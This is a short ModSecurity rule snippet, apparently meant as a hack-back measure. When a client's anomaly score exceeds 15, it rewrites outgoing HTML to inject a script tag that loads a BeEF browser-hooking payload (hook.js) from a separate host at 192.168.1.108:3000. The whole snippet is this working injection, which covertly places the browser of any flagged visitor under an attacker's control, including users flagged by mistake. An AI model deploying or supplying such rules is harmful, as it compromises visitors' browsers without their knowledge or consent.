SecRule TX:ANOMALY_SCORE "@gt 15" "chain,id:'999224',phase:4,t:none,pass,log,msg:'Hooking Client with BeEF due to high anomaly score.'"
  SecRule STREAM_OUTPUT_BODY "@rsub s/<\/html>/<script src=\"http:\/\/192.168.1.108:3000\/hook.js\"><\/script><\/html>/"


